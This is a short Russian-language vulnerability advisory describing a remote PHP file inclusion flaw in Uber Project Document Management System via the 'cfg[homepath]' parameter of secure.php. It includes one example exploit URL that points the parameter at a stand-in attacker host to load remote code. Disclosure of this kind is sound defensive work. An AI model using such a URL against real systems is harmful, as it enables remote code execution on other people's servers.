Программа: Uber Project Document Management System

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "cfg[homepath]" сценарием secure.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://www.hedef.com/[script_path]/login/secure.php?cfg[homepath]=http://evil_script ?



Оставить мнение